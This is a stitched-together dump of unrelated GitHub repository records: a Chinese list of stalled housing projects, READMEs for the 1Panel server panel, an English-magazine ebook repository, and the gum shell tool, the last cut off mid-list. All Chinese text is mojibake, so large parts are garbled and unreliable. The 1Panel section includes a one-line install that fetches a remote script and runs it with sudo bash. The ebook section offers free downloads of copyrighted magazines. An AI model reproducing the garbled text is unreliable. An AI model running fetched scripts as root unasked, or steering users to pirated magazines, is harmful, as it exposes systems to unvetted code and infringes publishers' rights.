ดไบง๏ผŒ็›‘็ฎก่ต„้‡‘ๅทฒ็ฉบ๏ผŒๆฅผ็›˜่‡ชๅŽปๅนดๅทฒ็ปๅœๅทฅ [ๅผ€ๅ‘ๅ•†ๅ€บๆƒ็”ณๆŠฅ](https://user-images.githubusercontent.com/38778288/180631681-31d1acb2-a6d5-4650-8ad4-4ddc352a9641.jpeg) - ้‡ๅบ†ๅธ‚-ๅŒ—็ขšๅŒบ-่žๅˆ›ๆ˜ ๆน–ๅ้‡Œ ็ƒ‚ๅฐพๆฅผ็›˜ - ๆต™ๆฑŸ็œ-ๆญๅทžๅธ‚-็ปฟๅœฐๆŸๆพœๆ™ถ่ˆ(ๆŽจๅนฟๅ:็ปฟๅœฐไบšๆดฒๅ…ฌๅ›ญ) [#292](https://github.com/WeNeedHome/SummaryOfLoanSuspension/pull/292) [ๅœๅทฅๅ‘Š็Ÿฅ](https://raw.githubusercontent.com/WeNeedHome/SummaryOfLoanSuspension/0e560306424c6adfb67f13e12d3f4a3a7c3e06ff/images/%E7%BB%BF%E5%9C%B0%E6%9F%8F%E6%BE%9C%E6%99%B6%E8%88%8D%E5%BB%B6%E6%9C%9F%E4%BA%A4%E4%BB%98%E9%80%9A%E7%9F%A5%E4%B9%A6.jpg) - ๅฎ‰ๅพฝ็œ-ๅˆ่‚ฅๅธ‚-ๆ–ฐ็ซ™ๅŒบๆญฃ่ฃไธญๅฟƒ ็›ฎๅ‰่ฏฅๅฐๅŒบ็š„้…ๅฅ—้กน็›ฎๅทฒ็ป็ƒ‚ๅฐพ๏ผŒไฝๅฎ…ๅทฒ็ปไบคไป˜้ƒจๅˆ† [#320](https://github.com/WeNeedHome/SummaryOfLoanSuspension/pull/320) [ๅ›พไธ€](https://raw.githubusercontent.com/WeNeedHome/SummaryOfLoanSuspension/16f3c43cf767c2b6d3ec2c4c459c6c14e0d00e9b/images/%E5%90%88%E8%82%A5%E6%96%B0%E7%AB%99%E5%8C%BA%E6%AD%A3%E8%8D%A3%E4%B8%AD%E5%BF%83.jpeg) [ๅ›พไบŒ](https://raw.githubusercontent.com/WeNeedHome/SummaryOfLoanSuspension/16f3c43cf767c2b6d3ec2c4c459c6c14e0d00e9b/images/%E5%90%88%E8%82%A5%E6%96%B0%E7%AB%99%E5%8C%BA%E6%AD%A3%E8%8D%A3%E4%B8%AD%E5%BF%83%E7%83%82%E5%B0%BE%E6%94%BF%E5%BA%9C%E5%8F%8D%E9%A6%88.jpeg) - ๆน–ๅŒ—็œ-ๆญฆๆฑ‰ๅธ‚-็ปฟๅœฐๅคง้ƒฝไผš [#520](https://github.com/WeNeedHome/SummaryOfLoanSuspension/pull/520) - ๆฑŸ่ฅฟ็œ-ๆŠšๅทžๅธ‚-ไธœไนกๅŒบ็บขๆ˜Ÿ้›…่‹‘ 10ๅนดๆœช่ƒฝๅŠž็†ๆˆฟไบง่ฏ [#565](https://github.com/WeNeedHome/SummaryOfLoanSuspension/discussions/565) - ๅ››ๅท็œ-ๆˆ้ƒฝๅธ‚-ไธญๆตท้”ฆๆฑŸๅŸŽไบ‘็†™ไบŒๆœŸ๏ผŒไบบๅฑ…ๆ™บ่ŸๅŸŽ [#586](https://github.com/WeNeedHome/SummaryOfLoanSuspension/pull/586) - ้‡ๅบ†ๅธ‚-ๅŒ—็ขšๅŒบ-ๅŒ—็ขšๅˆซๅข…็พค๏ผˆๅฐๅŒบๅๅญ—ไธ่ฎฐๅพ—๏ผŒๅœจ้‡ๅบ†ๅŒ—็ขšๅพˆๅ‡บๅ๏ผ‰ [#692](https://github.com/WeNeedHome/SummaryOfLoanSuspension/pull/692) - ๆต™ๆฑŸ็œ-ๆญๅทžๅธ‚-็ปฟๅœฐไผ—ๅฎ‰ๅฎธ็€š้‡Œ๏ผˆๅทฒ็ป“ๆŸ๏ผ‰ [#718](https://github.com/WeNeedHome/SummaryOfLoanSuspension/pull/718) [็ปฟ่‡ป็ฝฎไธšๅ…ฌๅ‘Š](https://user-images.githubusercontent.com/16377295/179204666-6df50f70-0e5f-401f-929b-b1de3dac2637.png) - ้™•่ฅฟ็œ-ๅ’ธ้˜ณๅธ‚-[่žๅˆ›ๅพกๆฒณๅฎธ้™ขDK6](https://github.com/WeNeedHome/SummaryOfLoanSuspension/blob/ae61f72dd4d54b63c32b1ffa65d78d17fde2c5f8/images/%E9%99%95%E8%A5%BF%E7%9C%81/%E5%92%B8%E9%98%B3%E5%B8%82/%E5%92%B8%E9%98%B3%E8%9E%8D%E5%88%9B%E5%BE%A1%E6%B2%B3%E5%AE%B8%E9%99%A2DK6%E5%85%A8%E4%BD%93%E4%B8%9A%E4%B8%BB%E5%81%9C%E8%B4%A7%E5%91%8A%E7%9F%A5%E4%B9%A6.png)๏ผˆๅทฒ็ป“ๆŸ๏ผ‰ [2023/12็š„ๅฝ’ๅฟƒๅฎถไนฆ](https://mp.weixin.qq.com/s/ZX6n0dz5Ali-DzgShoQfBA) - ๅนฟ่ฅฟ็œ-ๅ—ๅฎๅธ‚-ๅฝ“ไปฃ้”ฆๅ›ญ3ใ€5ๅทๆฅผ [#896](https://github.com/WeNeedHome/SummaryOfLoanSuspension/pull/896) - ไบ‘ๅ—็œ-ๆ˜†ๆ˜Žๅธ‚-ๅˆซๆ ทๅนธ็ฆๅŸŽ [#925](https://github.com/WeNeedHome/SummaryOfLoanSuspension/discussions/925) - ๅนฟไธœ็œ-ๆฑ•ๅคดๅธ‚-ๆ’ๅคง้‡‘็ขงๆฑŸๆนพ6ๆœŸ [#993](https://github.com/WeNeedHome/SummaryOfLoanSuspension/discussions/993) [ๅ›พ](https://user-images.githubusercontent.com/50266660/180631384-35f3a5da-97e8-4dcf-a98a-9ecf66c0823c.jpg) - ๅนฟไธœ็œ-ๆทฑๅœณๅธ‚-็›็”ฐไฝณๅ…†ไธšๅพก็’Ÿไฝณๅ›ญๅนฟๅœบ [#1003](https://github.com/WeNeedHome/SummaryOfLoanSuspension/pull/1003) - ็ฆๅปบ็œ-ๅปบ็“ฏๅธ‚-ๆ’ๅคงๆบชๅฑฑๅ…ฌ้ฆ† [#1062](https://github.com/WeNeedHome/SummaryOfLoanSuspension/discussions/1062) - ไบ‘ๅ—็œ-่ฅฟๅŒ็‰ˆ็บณๅ‚ฃๆ—่‡ชๆฒปๅทž-่žๅˆ›ๆ—…ๆธธๅบฆๅ‡ๅŒบ [#558](https://github.com/WeNeedHome/SummaryOfLoanSuspension/discussions/558) - ๆน–ๅŒ—็œ-่ฅ„้˜ณๅธ‚-่žๅˆ›ๆฐ‘ๅ‘ๅพกๆน–ๅฃนๅท ็ƒ‚ๅฐพไบ† ๅทฒ็ปๅผ€ๅง‹ๅœจ้—จๅฃๆ‹‰ๆจชๅน…ไบ† [comment](https://github.com/WeNeedHome/SummaryOfLoanSuspension/discussions/1134#discussioncomment-3452874) - ๆฒณๅ—็œ-้ƒ‘ๅทžๅธ‚-้‡‘็ง‘ๆ˜Ÿๆพœๅ›ญ [comment](https://github.com/WeNeedHome/SummaryOfLoanSuspension/discussions/423#discussioncomment-3152066) - ๆฑŸ่‹็œ-่‹ๅทžๅธ‚-ๆ’ๅคงๆ‚ฆ็‘ๆนพ ๅ…ซๆœˆๅบ•ไบคๆˆฟไธไบคๆˆฟๅฐฑๅœ่ดท [comment](https://github.com/WeNeedHome/SummaryOfLoanSuspension/discussions/6#discussioncomment-3256616) - ๅ››ๅท็œ-ๆˆ้ƒฝๅธ‚-้พ™ๆณ‰-ๅนธ็ฆไธœๆ–น็™ฝๆกฆๆž— [#1190](https://github.com/WeNeedHome/SummaryOfLoanSuspension/discussions/1190) - ๆน–ๅŒ—็œ-ๆญฆๆฑ‰ๅธ‚-ๆฑŸๅฒธๅŒบๆ˜Ÿๆน–ๆนพ [#1195](https://github.com/WeNeedHome/SummaryOfLoanSuspension/pull/1195) - ๅฑฑ่ฅฟ็œ-ๅคชๅŽŸๅธ‚-้˜ณๅ…‰ๅŸŽๅนถๅทžๅบœ [#1200](https://github.com/WeNeedHome/SummaryOfLoanSuspension/pull/1200)
ๅ…จๅ›ฝๅ„็œๅธ‚ๅœ่ดท้€š็Ÿฅๆฑ‡ๆ€ป
null
0
137
519
1,080
0
2
1
1Panel-dev/1Panel
<p align="center"><a href="https://1panel.cn"><img src="http://1panel.oss-cn-hangzhou.aliyuncs.com/img/1panel-logo.png" alt="1Panel" width="300" /></a></p> <p align="center"><b>็ŽฐไปฃๅŒ–ใ€ๅผ€ๆบ็š„ Linux ๆœๅŠกๅ™จ่ฟ็ปด็ฎก็†้ขๆฟ</b></p> <p align="center"><a href="https://hellogithub.com/repository/71791baf930149ac9b84e1acf186573f" target="_blank"><img src="https://api.hellogithub.com/v1/widgets/recommend.svg?rid=71791baf930149ac9b84e1acf186573f&claim_uid=p8vB3kP5CMrthiL&theme=dark&theme=neutral" alt="Featured๏ฝœHelloGitHub" style="width: 250px; height: 54px;" width="250" height="54" /></a></p> <p align="center"> <a href="https://www.gnu.org/licenses/gpl-3.0.html"><img src="https://shields.io/github/license/1Panel-dev/1Panel?color=%231890FF" alt="License: GPL v3"></a> <a href="https://app.codacy.com/gh/1Panel-dev/1Panel?utm_source=github.com&utm_medium=referral&utm_content=1Panel-dev/1Panel&utm_campaign=Badge_Grade_Dashboard"><img src="https://app.codacy.com/project/badge/Grade/da67574fd82b473992781d1386b937ef" alt="Codacy"></a> <a href="https://github.com/1Panel-dev/1Panel/releases"><img src="https://img.shields.io/github/v/release/1Panel-dev/1Panel" alt="GitHub release"></a> <a href="https://github.com/1Panel-dev/1Panel"><img src="https://img.shields.io/github/stars/1Panel-dev/1Panel?color=%231890FF&style=flat-square" alt="GitHub Stars"></a> <a href="https://gitee.com/fit2cloud-feizhiyun/1Panel"><img src="https://gitee.com/fit2cloud-feizhiyun/1Panel/badge/star.svg?theme=gvp" alt="Gitee Stars"></a><br> [<a href="docs/README_TW.md">ไธญๆ–‡(็น้ซ”)</a>] | [<a href="docs/README_EN.md">English</a>] | [<a href="docs/README_JP.md">ๆ—ฅๆœฌ่ชž</a>] </p> [![Watch the video](https://resource.fit2cloud.com/1panel/img/overview_video.png)](https://www.bilibili.com/video/BV1Mt421n7LZ/) ------------------------------ ## ไป€ไนˆๆ˜ฏ 1Panel๏ผŸ 1Panel ๆ˜ฏๆ–ฐไธ€ไปฃ็š„ Linux ๆœๅŠกๅ™จ่ฟ็ปด็ฎก็†้ขๆฟใ€‚ - **้ซ˜ๆ•ˆ็ฎก็†**๏ผš็”จๆˆทๅฏไปฅ้€š่ฟ‡ Web ๅ›พๅฝข็•Œ้ข่ฝปๆพ็ฎก็† Linux ๆœๅŠกๅ™จ๏ผŒๅฎž็Žฐไธปๆœบ็›‘ๆŽงใ€ๆ–‡ไปถ็ฎก็†ใ€ๆ•ฐๆฎๅบ“็ฎก็†ใ€ๅฎนๅ™จ็ฎก็†็ญ‰ๅŠŸ่ƒฝ๏ผ› - **ๅฟซ้€Ÿๅปบ็ซ™**๏ผšๆทฑๅบฆ้›†ๆˆๅผ€ๆบๅปบ็ซ™่ฝฏไปถ WordPress ๅ’Œ [Halo](https://github.com/halo-dev/halo/)๏ผŒๅŸŸๅ็ป‘ๅฎšใ€SSL ่ฏไนฆ้…็ฝฎ็ญ‰ๆ“ไฝœไธ€้”ฎๆžๅฎš๏ผ› - **ๅบ”็”จๅ•†ๅบ—**๏ผš็ฒพ้€‰ไธŠๆžถๅ„็ฑป้ซ˜่ดจ้‡็š„ๅผ€ๆบๅทฅๅ…ทๅ’Œๅบ”็”จ่ฝฏไปถ๏ผŒๅๅŠฉ็”จๆˆท่ฝปๆพๅฎ‰่ฃ…ๅนถๅ‡็บง๏ผ› - **ๅฎ‰ๅ…จๅฏ้ **๏ผšๅŸบไบŽๅฎนๅ™จ็ฎก็†ๅนถ้ƒจ็ฝฒๅบ”็”จ๏ผŒๅฎž็Žฐๆœ€ๅฐ็š„ๆผๆดžๆšด้œฒ้ข๏ผŒๅŒๆ—ถๆไพ›้˜ฒ็ซๅข™ๅ’Œๆ—ฅๅฟ—ๅฎก่ฎก็ญ‰ๅŠŸ่ƒฝ๏ผ› - **ไธ€้”ฎๅค‡ไปฝ**๏ผšๆ”ฏๆŒไธ€้”ฎๅค‡ไปฝๅ’Œๆขๅค๏ผŒ็”จๆˆทๅฏไปฅๅฐ†ๆ•ฐๆฎๅค‡ไปฝๅˆฐๅ„็ฑปไบ‘็ซฏๅญ˜ๅ‚จไป‹่ดจ๏ผŒๆฐธไธไธขๅคฑใ€‚ ## ๅฟซ้€Ÿๅผ€ๅง‹ **ไธ€้”ฎๅฎ‰่ฃ…** ๆ‰ง่กŒๅฆ‚ไธ‹ๅ‘ฝไปคไธ€้”ฎๅฎ‰่ฃ… 1Panel: ```sh curl -sSL https://resource.fit2cloud.com/1panel/package/quick_start.sh -o quick_start.sh && sudo bash quick_start.sh ``` ๅฆ‚ๆžœๆ˜ฏ็”จไบŽ็ฆป็บฟ็Žฏๅขƒ๏ผŒๆŽจ่ไฝฟ็”จ [ๅฎ‰่ฃ…ๅŒ…ๆ–นๅผ](https://1panel.cn/docs/installation/package_installation/) ่ฟ›่กŒๅฎ‰่ฃ…้ƒจ็ฝฒใ€‚ **ๅญฆไน ่ต„ๆ–™** - [ๅœจ็บฟๆ–‡ๆกฃ](https://1panel.cn/docs/) - [็คพๅŒบ่ฎบๅ›](https://bbs.fit2cloud.com/c/1p/7) - [ๅฆ‚ไฝ•ๅŠ ๅ…ฅๅพฎไฟกไบคๆต็พค?](https://bbs.fit2cloud.com/t/topic/2147) ## ้ฃž่‡ดไบ‘็š„ๅ…ถไป–ๆ˜Žๆ˜Ÿ้กน็›ฎ - [MaxKB](https://github.com/1Panel-dev/MaxKB/) - ๅŸบไบŽ LLM ๅคง่ฏญ่จ€ๆจกๅž‹็š„ๅผ€ๆบ็Ÿฅ่ฏ†ๅบ“้—ฎ็ญ”็ณป็ปŸ - [JumpServer](https://github.com/jumpserver/jumpserver/) - ๅนฟๅ—ๆฌข่ฟŽ็š„ๅผ€ๆบๅ กๅž’ๆœบ - [Halo](https://github.com/halo-dev/halo/) - ๅผบๅคงๆ˜“็”จ็š„ๅผ€ๆบๅปบ็ซ™ๅทฅๅ…ท - [DataEase](https://github.com/dataease/dataease/) - ไบบไบบๅฏ็”จ็š„ๅผ€ๆบๆ•ฐๆฎๅฏ่ง†ๅŒ–ๅˆ†ๆžๅทฅๅ…ท - [MeterSphere](https://github.com/metersphere/metersphere/) - ๅผ€ๆบ่‡ชๅŠจๅŒ–ๆต‹่ฏ•ๅนณๅฐ ## License Copyright (c) 2014-2024 [FIT2CLOUD ้ฃž่‡ดไบ‘](https://fit2cloud.com/), All rights reserved. Licensed under The GNU General Public License version 3 (GPLv3) (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at <https://www.gnu.org/licenses/gpl-3.0.html> Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License.
๐Ÿ”ฅ ๐Ÿ”ฅ ๐Ÿ”ฅ ็ŽฐไปฃๅŒ–ใ€ๅผ€ๆบ็š„ Linux ๆœๅŠกๅ™จ่ฟ็ปด็ฎก็†้ขๆฟใ€‚
appstore,database,docker,docker-compose,lamp,lnmp,panel,crontab,docker-container,docker-image
64
67
2,195
2,809
493
16
8
hehonghui/awesome-english-ebooks
# ็ปๆตŽๅญฆไบบใ€็บฝ็บฆๅฎข็ญ‰่‹ฑ่ฏญๅค–ๅˆŠๆ‚ๅฟ—ไธ‹่ฝฝ --------------------- ## ไธ€ใ€ไผ˜่ดจAppๆŽจ่ * <img align="center" src="https://ereader.link/images/ereader.png" width="32px" /> ่‹ฑ้˜…้˜…่ฏปๅ™จ - ่ถ…ๅฅฝ็”จ็š„่‹ฑ่ฏญ้˜…่ฏป็ฅžๅ™จ, <font color="#e3120b">่ฎฉๆ‚จ่ฝปๆพ่ฏปๆ‡‚่‹ฑๆ–‡ๅฐ่ฏดใ€ๅค–ๅˆŠๆ‚ๅฟ—</font>,ๆ”ฏๆŒ็‚นๅ‡ปๆŸฅ่ฏใ€ๅฅๅญ็ฟป่ฏ‘ใ€mdict่‹ฑๆฑ‰-่‹ฑ่‹ฑ่ฏๅ…ธใ€้˜…่ฏป็ฌ”่ฎฐ็ญ‰ๅŠŸ่ƒฝ,[iOS็‰ˆไธ‹่ฝฝ](https://apps.apple.com/cn/app/ereader-%E8%8B%B1%E9%98%85%E9%98%85%E8%AF%BB%E5%99%A8/id1558805880)ใ€[Android็‰ˆไธ‹่ฝฝ](https://www.coolapk.com/apk/283424); --------------------- ## ไบŒใ€ๅ†…ๅฎนๅˆ†็ฑป * [็ปๆตŽๅญฆไบบ - ๅ‘จๅˆŠ, ็‚นๅ‡ป่ฟ™้‡Œไธ‹่ฝฝๆœ€ๆ–ฐไธ€ๆœŸ](01_economist/te_2024.06.22) , ๆฏๅ‘จไบ”ๅไธ€็‚นๆ›ดๆ–ฐ * [็บฝ็บฆๅฎข - ๅ‘จๅˆŠ, ็‚นๅ‡ป่ฟ™้‡Œไธ‹่ฝฝๆœ€ๆ–ฐไธ€ๆœŸ](02_new_yorker/2024.06.24) , ๆฏๅ‘จๅ…ญไธŠๅˆๆ›ดๆ–ฐ * [ๅซๆŠฅ - ๆฏๅ‘จไธคๆœŸ](09_guardian/), ๆฏๅ‘จไธ‰ใ€ๅ‘จๆ—ฅๆ›ดๆ–ฐ * [The Atlantic - ๆœˆๅˆŠ](04_atlantic), ๆฏๆœˆ2ๅทๆ›ดๆ–ฐ * [Wired - ๆœˆๅˆŠ](05_wired), ๆฏๆœˆ2ๅทๆ›ดๆ–ฐ **ๅฆ‚ไฝ•้€‰ๆ‹ฉๆ‚ๅฟ— ? ่ฏทๅ‚่€ƒไธ‹้ขไธค็ฏ‡ๆ–‡็ซ ** * [่€ƒ็ ”่‹ฑ่ฏญ้ข˜ๆบๅˆ†ๆž๏ผŒ็œ‹็œ‹้ข˜็›ฎๆฅ่‡ชไบŽๅ“ช้‡Œ](https://zhuanlan.zhihu.com/p/25051680) * [2018่‹ฑ่ฏญๅค–ๅˆŠๅคงๅˆ้›†](https://zhuanlan.zhihu.com/p/54181221) ------------------------------------- ## ไธ‰ใ€ๅ…ถไป–้˜…่ฏปๅ™จ 1. epub ๆ ผๅผ็š„็”ตๅญไนฆๅฏไปฅๅฎ‰่ฃ… [ๅคš็œ‹้˜…่ฏป](https://www.duokan.com/product) , ้€š่ฟ‡ `wifiไผ ไนฆๅŠŸ่ƒฝ` ้€š่ฟ‡ๆต่งˆๅ™จๅฐ†็”ตๅญไนฆไผ ๅ…ฅๅˆฐ้˜…่ฏปๅ™จไธญ, ็„ถๅŽๅฐฑๅฏไปฅ่ฟ›่กŒ้˜…่ฏป; 2. mobi ๆ ผๅผ็š„็”ตๅญไนฆ้œ€่ฆไฝฟ็”จ `kindle่ฎพๅค‡` ๆˆ–่€…ๅœจ็”ต่„‘ใ€ๆ‰‹ๆœบไธŠๅฎ‰่ฃ… [kindle ้˜…่ฏปapp](https://www.amazon.cn/kindle-dbs/fd/kcp/ref=sv_kinc_0)
็ปๆตŽๅญฆไบบ(ๅซ้Ÿณ้ข‘)ใ€็บฝ็บฆๅฎขใ€ๅซๆŠฅใ€่ฟž็บฟใ€ๅคง่ฅฟๆด‹ๆœˆๅˆŠ็ญ‰่‹ฑ่ฏญๆ‚ๅฟ—ๅ…่ดนไธ‹่ฝฝ,ๆ”ฏๆŒepubใ€mobiใ€pdfๆ ผๅผ, ๆฏๅ‘จๆ›ดๆ–ฐ
download,ebooks,economist,economist-ebooks,new-yorker,pdf
0
1
3
114
0
1
0
charmbracelet/gum
Gum === <p> <a href="https://stuff.charm.sh/gum/nutritional-information.png" target="_blank"><img src="https://stuff.charm.sh/gum/gum.png" alt="Gum Image" width="450" /></a> <br><br> <a href="https://github.com/charmbracelet/gum/releases"><img src="https://img.shields.io/github/release/charmbracelet/gum.svg" alt="Latest Release"></a> <a href="https://pkg.go.dev/github.com/charmbracelet/gum?tab=doc"><img src="https://godoc.org/github.com/golang/gddo?status.svg" alt="Go Docs"></a> <a href="https://github.com/charmbracelet/gum/actions"><img src="https://github.com/charmbracelet/gum/workflows/build/badge.svg" alt="Build Status"></a> </p> A tool for glamorous shell scripts. Leverage the power of [Bubbles](https://github.com/charmbracelet/bubbles) and [Lip Gloss](https://github.com/charmbracelet/lipgloss) in your scripts and aliases without writing any Go code! <img alt="Shell running the ./demo.sh script" width="600" src="https://vhs.charm.sh/vhs-1qY57RrQlXCuydsEgDp68G.gif"> The above example is running from a single shell script ([source](./examples/demo.sh)). ## Tutorial Gum provides highly configurable, ready-to-use utilities to help you write useful shell scripts and dotfiles aliases with just a few lines of code. Let's build a simple script to help you write [Conventional Commits](https://www.conventionalcommits.org/en/v1.0.0/#summary) for your dotfiles. Ask for the commit type with gum choose: ```bash gum choose "fix" "feat" "docs" "style" "refactor" "test" "chore" "revert" ``` > [!NOTE] > This command itself will print to stdout which is not all that useful. To make use of the command later on you can save the stdout to a `$VARIABLE` or `file.txt`. Prompt for the scope of these changes: ```bash gum input --placeholder "scope" ``` Prompt for the summary and description of changes: ```bash gum input --value "$TYPE$SCOPE: " --placeholder "Summary of this change" gum write --placeholder "Details of this change" ``` Confirm before committing: ```bash gum confirm "Commit changes?" && git commit -m "$SUMMARY" -m "$DESCRIPTION" ``` Check out the [complete example](https://github.com/charmbracelet/gum/blob/main/examples/commit.sh) for combining these commands in a single script. <img alt="Running the ./examples/commit.sh script to commit to git" width="600" src="https://vhs.charm.sh/vhs-7rRq3LsEuJVwhwr0xf6Er7.gif"> ## Installation Use a package manager: ```bash # macOS or Linux brew install gum # Arch Linux (btw) pacman -S gum # Nix nix-env -iA nixpkgs.gum # Windows (via WinGet or Scoop) winget install charmbracelet.gum scoop install charm-gum ``` <details> <summary>Debian/Ubuntu</summary> ```bash sudo mkdir -p /etc/apt/keyrings curl -fsSL https://repo.charm.sh/apt/gpg.key | sudo gpg --dearmor -o /etc/apt/keyrings/charm.gpg echo "deb [signed-by=/etc/apt/keyrings/charm.gpg] https://repo.charm.sh/apt/ * *" | sudo tee /etc/apt/sources.list.d/charm.list sudo apt update && sudo apt install gum ``` </details> <details> <summary>Fedora/RHEL</summary> ```bash echo '[charm] name=Charm baseurl=https://repo.charm.sh/yum/ enabled=1 gpgcheck=1 gpgkey=https://repo.charm.sh/yum/gpg.key' | sudo tee /etc/yum.repos.d/charm.repo sudo yum install gum ``` </details> Or download it: * [Packages][releases] are available in Debian, RPM, and Alpine formats * [Binaries][releases] are available for Linux, macOS, Windows, FreeBSD, OpenBSD, and NetBSD Or just install it with `go`: ```bash go install github.com/charmbracelet/gum@latest ``` [releases]: https://github.com/charmbracelet/gum/releases ## Commands * [`choose`](#choose): Choose an option from a list of choices * [`confirm`](#confirm): Ask a user to confirm an action * [`file`](#file): Pick a file from a folder * [`filter`](#filter): Filter items from a list * [`format`](#format): Format a string using a template * [`input`](#input): Prompt for some input * [`join`](#join): Join text vertically or horizontally * [`pager`](#pager): Scroll through a file * [`spin`](#spin): Display spinner while running a command * [`style`](#style): Apply coloring, borders, spacing to text * [`table`](#table): Render a table of data * [`write`](#write): Prompt for long-form text * [`log`](#log): Log messages to output ## Customization You can customize `gum` options and styles with `--flags` and `$ENVIRONMENT_VARIABLES`. See `gum <command> --help` for a full view of each command's customization and configuration options. Customize with `--flags`: ```bash gum input --cursor.foreground "#FF0" \ --prompt.foreground "#0FF" \ --placeholder "What's up?" \ --prompt "* " \ --width 80 \ --value "Not much, hby?" ``` Customize with `ENVIRONMENT_VARIABLES`: ```bash export GUM_INPUT_CURSOR_FOREGROUND="#FF0" export GUM_INPUT_PROMPT_FOREGROUND="#0FF" export GUM_INPUT_PLACEHOLDER="What's up?" export GUM_INPUT_PROMPT="* " export GUM_INPUT_WIDTH=80 # --flags can override values set with environment gum input ``` <img alt="Gum input displaying most customization options" width="600" src="https://vhs.charm.sh/vhs-5zb9DlQYA70aL9ZpYLTwKv.gif"> ## Input Prompt for input with a simple command. ```bash gum input > answer.txt gum input --password > password.txt ``` <img src="https://vhs.charm.sh/vhs-1nScrStFI3BMlCp5yrLtyg.gif" width="600" alt="Shell running gum input typing Not much, you?" /> ## Write Prompt for some multi-line text (`ctrl+d` to complete text entry). ```bash gum write > story.txt ``` <img src="https://vhs.charm.sh/vhs-7abdKKrUEukgx9aJj8O5GX.gif" width="600" alt="Shell running gum write typing a story" /> ## Filter Filter a list of values with fuzzy matching: ```bash echo Strawberry >> flavors.txt echo Banana >> flavors.txt echo Cherry >> flavors.txt gum filter < flavors.txt > selection.txt ``` <img src="https://vhs.charm.sh/vhs-61euOQtKPtQVD7nDpHQhzr.gif" width="600" alt="Shell running gum filter on different bubble gum flavors" /> Select multiple options with the `--limit` flag or `--no-limit` flag. Use `tab` or `ctrl+space` to select, `enter` to confirm. ```bash cat flavors.txt | gum filter --limit 2 cat flavors.txt | gum filter --no-limit ``` ## Choose Choose an option from a list of choices. ```bash echo "Pick a card, any card..." CARD=$(gum choose --height 15 {{A,K,Q,J},{10..2}}" "{โ™ ,โ™ฅ,โ™ฃ,โ™ฆ}) echo "Was your card the $CARD?" ``` You can also select multiple items with the `--limit` or `--no-limit` flag, which determines the maximum of items that can be chosen. ```bash cat songs.txt | gum choose --limit 5 cat foods.txt | gum choose --no-limit --header "Grocery Shopping" ``` <img src="https://vhs.charm.sh/vhs-3zV1LvofA6Cbn5vBu1NHHl.gif" width="600" alt="Shell running gum choose with numbers and gum flavors" /> ## Confirm Confirm whether to perform an action. Exits with code `0` (affirmative) or `1` (negative) depending on selection. ```bash gum confirm && rm file.txt || echo "File not removed" ``` <img src="https://vhs.charm.sh/vhs-3xRFvbeQ4lqGerbHY7y3q2.gif" width="600" alt="Shell running gum confirm" /> ## File Prompt the user to select a file from the file tree. ```bash EDITOR $(gum file $HOME) ``` <img src="https://vhs.charm.sh/vhs-2RMRqmnOPneneIgVJJ3mI1.gif" width="600" alt="Shell running gum file" /> ## Pager Scroll through a long document with line numbers and a fully customizable viewport. ```bash gum pager < README.md ``` <img src="https://vhs.charm.sh/vhs-3iMDpgOLmbYr0jrYEGbk7p.gif" width="600" alt="Shell running gum pager" /> ## Spin Display a spinner while running a script or command. The spinner will automatically stop after the given command exits. To view or pipe the command's output, use the `--show-output` flag. ```bash gum spin --spinner dot --title "Buying Bubble Gum..." -- sleep 5 ``` <img src="https://vhs.charm.sh/vhs-3YFswCmoY4o3Q7MyzWl6sS.gif" width="600" alt="Shell running gum spin while sleeping for 5 seconds" /> Available spinner types include: `line`, `dot`, `minidot`, `jump`, `pulse`, `points`, `globe`, `moon`, `monkey`, `meter`, `hamburger`. ## Table Select a row from some tabular data. ```bash gum table < flavors.csv | cut -d ',' -f 1 ``` <!-- <img src="https://stuff.charm.sh/gum/table.gif" width="600" alt="Shell running gum table" /> --> ## Style Pretty print any string with any layout with one command. ```bash gum style \ --foreground 212 --border-foreground 212 --border double \ --align center --width 50 --margin "1 2" --padding "2 4" \ 'Bubble Gum (1ยข)' 'So sweet and so fresh!' ``` <img src="https://github.com/charmbracelet/gum/assets/42545625/67468acf-b3e0-4e78-bd89-360739eb44fa" width="600" alt="Bubble Gum, So sweet and so fresh!" /> ## Join Combine text vertically or horizontally. Use this command with `gum style` to build layouts and pretty output. Tip: Always wrap the output of `gum style` in quotes to preserve newlines (`\n`) when using it as an argument in the `join` command. ```bash I=$(gum style --padding "1 5" --border double --border-foreground 212 "I") LOVE=$(gum style --padding "1 4" --border double --border-foreground 57 "LOVE") BUBBLE=$(gum style --padding "1 8" --border double --border-foreground 255 "Bubble") GUM=$(gum style --padding "1 5" --border double --border-foreground 240 "Gum") I_LOVE=$(gum join "$I" "$LOVE") BUBBLE_GUM=$(gum join "$BUBBLE" "$GUM") gum join --align center --vertical "$I_LOVE" "$BUBBLE_GUM" ``` <img src="https://github.com/charmbracelet/gum/assets/42545625/68f7a25d-b495-48dd-982a-cee0c8ea5786" width="600" alt="I LOVE Bubble Gum written out in four boxes with double borders around them." /> ## Format `format` processes and formats bodies of text. `gum format` can parse markdown, template strings, and named emojis. ```bash # Format some markdown gum format -- "# Gum Formats" "- Markdown" "- Code" "- Template" "- Emoji" echo "# Gum Formats\n- Markdown\n- Code\n- Template\n- Emoji" | gum format # Syntax highlight some code cat main.go | gum format -t code # Render text any way you want with templates echo '{{ Bold "Tasty" }} {{ Italic "Bubble" }} {{ Color "99" "0" " Gum " }}' \ | gum format -t template # Display your favorite emojis! echo 'I :heart: Bubble Gum :candy:' | gum format -t emoji ``` For more information on template helpers, see the [Termenv docs](https://github.com/muesli/termenv#template-helpers). For a full list of named emojis see the [GitHub API](https://api.github.com/emojis). <img src="https://github.com/charmbracelet/gum/assets/42545625/5cfbb0c8-0022-460d-841b-fec37527ca66" width="300" alt="Running gum format for different types of formats" /> ## Log `log` logs messages to the terminal at using different levels and styling using the [`charmbracelet/log`](https://github.com/charmbracelet/log) library. ```bash # Log some debug information. gum log --structured --level debug "Creating file..." name file.txt # DEBUG Unable to create file. name=temp.txt # Log some error. gum log --structured --level error "Unable to create file." name file.txt # ERROR Unable to create file. name=temp.txt # Include a timestamp. gum log --time rfc822 --level error "Unable to create file." ``` See the Go [`time` package](https://pkg.go.dev/time#pkg-constants) for acceptable `--time` formats. See [`charmbracelet/log`](https://github.com/charmbracelet/log) for more usage. <img src="https://vhs.charm.sh/vhs-6jupuFM0s2fXiUrBE0I1vU.gif" width="600" alt="Running gum log with debug and error levels" /> ## Examples How to use `gum` in your daily workflows: See the [examples](./examples/) directory for more real world use cases. * Write a commit 